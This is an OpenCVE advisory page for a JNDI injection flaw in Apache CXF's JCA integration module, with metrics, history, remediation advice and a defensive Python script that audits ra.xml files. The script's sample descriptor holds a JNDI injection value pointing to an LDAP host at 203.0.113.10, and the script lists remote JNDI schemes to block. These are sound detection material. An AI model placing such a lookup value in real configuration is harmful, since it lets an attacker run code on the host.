Description
A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
Published: 2026-06-12
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A JNDI injection flaw in Apache CXF's JCA integration module (the advisory title names the affected class as DispatchMDBMessageListenerImpl) allows an attacker who can alter the JCA deployment descriptor (ra.xml) or its runtime activation parameters to execute arbitrary code. The module passes a JNDI name taken from that configuration to a lookup without sufficient validation (CWE-20: Improper Input Validation); a name that resolves through a remote naming service, the classic JNDI injection pattern, can make the JVM load and execute attacker-supplied code, compromising the confidentiality, integrity, and availability of the affected host.

Affected Systems

The flaw affects Apache CXF, an Apache Software Foundation project. Releases before the fixed versions 4.2.2 and 4.1.7 are vulnerable: their JCA integration module performs JNDI lookups on configuration-supplied names without proper validation.

Risk and Exploitability

The current CVSS 3.1 vector is AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H (score 8.1, revised down from an initial 9.8 with AC:L): network-reachable without privileges or user interaction, but with high attack complexity, reflecting the precondition that a malicious value must first reach ra.xml or the activation parameters. EPSS is below 1%, the vulnerability is not listed in CISA's KEV catalog, and the SSVC record marks Exploitation as "none" and Automatable as "no", so there is no evidence of exploitation at the time of writing. The impact is nevertheless total (C:H/I:H/A:H) wherever an attacker can influence the descriptor or the activation configuration, for example through a compromised deployment pipeline, a writable configuration store, or local access to the host. Mitigations should therefore focus on controlling who can write those inputs and on rapid patching.

Generated by OpenCVE AI on June 12, 2026 at 16:39 UTC.

Remediation

No structured fix or workaround data has been recorded for this entry yet; the vendor description itself names Apache CXF 4.2.2 and 4.1.7 as the releases that fix the issue, and no separate workaround has been published.

OpenCVE Recommended Actions

  • Upgrade Apache CXF to version 4.2.2 or 4.1.7 (whichever matches the release line in use) to apply the JNDI injection fix.
  • If upgrading is not immediately possible, disable the JCA integration module until the upgrade can be applied.
  • Enforce strict file permissions on the JCA deployment descriptor (ra.xml) and on whatever supplies the runtime activation parameters, so that only authorized administrators can modify them, and review those values for JNDI references that point outside the container's java: namespace.
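The descriptor-review point above and the validation failure described under Impact, as an added example that is not part of Apache CXF or of the OpenCVE page: a small Python audit script that classifies JNDI lookup strings (the java: namespace and bare relative names pass; ldap, rmi, iiop and similar URL schemes that JNDI resolves over the network are rejected) and runs that check over a constructed ra.xml. The descriptor is built from standard JCA 1.5 element names, but the property names jndiName and dispatchTarget, the class names and the 203.0.113.10 address are invented for the example; the scheme denylist is a conservative illustration of the check, not CXF's own fix.

```python
"""Audit a JCA ra.xml for config-property values that would make a JNDI
lookup reach a remote naming service. Illustrative only: not Apache CXF
code; the sample descriptor below is constructed for this example."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import List, Tuple

# JNDI URL schemes that the JDK's built-in providers resolve over the network.
# Looking one of these up from attacker-controlled configuration is the classic
# JNDI-injection path: the remote server answers with a reference whose object
# factory the JVM then loads and executes.
REMOTE_JNDI_SCHEMES = frozenset(
    {"ldap", "ldaps", "rmi", "iiop", "iiopname", "corbaname", "dns"}
)

# RFC 3986 scheme syntax: a letter, then letters, digits, "+", "-" or ".".
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def classify_jndi_name(name: str) -> str:
    """'local' for java: names or bare relative names, 'remote' for URL
    schemes JNDI resolves over the network, 'unknown' for any other scheme."""
    match = _SCHEME_RE.match(name.strip())
    if match is None:
        return "local"          # e.g. ejb/OrderProcessor
    scheme = match.group(1).lower()
    if scheme == "java":
        return "local"          # e.g. java:comp/env/..., java:global/...
    if scheme in REMOTE_JNDI_SCHEMES:
        return "remote"
    return "unknown"


def is_safe_jndi_name(name: str) -> bool:
    """Allow-list guard to place in front of a lookup: only local names pass."""
    return classify_jndi_name(name) == "local"


def _local_name(tag: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def audit_ra_xml(xml_text: str) -> List[Tuple[str, str, str]]:
    """Return (property-name, value, verdict) for every <config-property>
    whose value is not a local JNDI name. Swap in defusedxml.ElementTree if
    the descriptor itself comes from an untrusted party."""
    root = ET.fromstring(xml_text)
    findings = []
    for prop in root.iter():
        if _local_name(prop.tag) != "config-property":
            continue
        prop_name, value = "", ""
        for child in prop:
            if _local_name(child.tag) == "config-property-name":
                prop_name = (child.text or "").strip()
            elif _local_name(child.tag) == "config-property-value":
                value = (child.text or "").strip()
        if value and classify_jndi_name(value) != "local":
            findings.append((prop_name, value, classify_jndi_name(value)))
    return findings


# Constructed sample descriptor: standard JCA 1.5 elements, invented values.
SAMPLE_RA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<connector xmlns="http://java.sun.com/xml/ns/j2ee" version="1.5">
  <display-name>Constructed sample resource adapter</display-name>
  <resourceadapter>
    <resourceadapter-class>example.ResourceAdapterImpl</resourceadapter-class>
    <config-property>
      <config-property-name>jndiName</config-property-name>
      <config-property-type>java.lang.String</config-property-type>
      <config-property-value>java:comp/env/ejb/OrderProcessor</config-property-value>
    </config-property>
    <config-property>
      <config-property-name>dispatchTarget</config-property-name>
      <config-property-type>java.lang.String</config-property-type>
      <config-property-value>ldap://203.0.113.10:1389/Exploit</config-property-value>
    </config-property>
  </resourceadapter>
</connector>
"""


def main(argv: List[str]) -> int:
    """Audit the ra.xml named on the command line (or the sample); exit code
    2 if a remote reference was found, 1 for anything else to review, else 0."""
    text = Path(argv[1]).read_text(encoding="utf-8") if len(argv) > 1 else SAMPLE_RA_XML
    findings = audit_ra_xml(text)
    for prop_name, value, verdict in findings:
        print(f"{prop_name} = {value!r} -> {verdict}")
    if any(verdict == "remote" for _, _, verdict in findings):
        return 2
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python audit_ra_xml.py /path/to/ra.xml`; with no argument it audits the embedded sample and exits 2 because of the ldap:// value. The same `is_safe_jndi_name` check is what a listener should apply before handing a configuration-supplied name to `InitialContext.lookup`, since a URL with a remote scheme is dispatched to that scheme's provider regardless of which naming service the container configured.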

Generated by OpenCVE AI on June 12, 2026 at 16:39 UTC.

Advisories

No advisories yet.

History

Fri, 12 Jun 2026 15:30:00 +0000

Type: Metrics
Values removed:
  cvssV3_1: {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}
  ssvc: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}
Values added:
  cvssV3_1: {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}
  ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 12 Jun 2026 14:30:00 +0000

Type: Metrics
Values removed: (none)
Values added:
  cvssV3_1: {'score': 9.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}
  ssvc: {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 12 Jun 2026 10:30:00 +0000

Type: References
Values removed: (none)
Values added: (not rendered on the page)

Fri, 12 Jun 2026 09:45:00 +0000

Type: Description, Title, Weaknesses, References
Values removed: (none)
Values added:
  Description: A JNDI Injection vulnerability has been discovered in Apache CXF's JCA integration module, which can allow for code execution, if an attacker is able to manipulate the JCA deployment descriptor (ra.xml) or runtime activation parameters. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fixes this issue.
  Title: Apache CXF: JNDI Injection vulnerability in DispatchMDBMessageListenerImpl
  Weaknesses: CWE-20
  References: (not rendered on the page)


MITRE

Status: PUBLISHED
Assigner: apache
Published:
Updated: 2026-06-12T14:36:44.254Z
Reserved: 2026-06-05T11:16:38.629Z
Link: CVE-2026-50633

Vulnrichment

Updated: 2026-06-12T09:28:11.629Z

NVD

Status: Undergoing Analysis
Published: 2026-06-12T10:16:23.297
Modified: 2026-06-12T16:16:33.483
Link: CVE-2026-50633

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-12T16:45:07Z

Weaknesses
  • CWE-20: Improper Input Validation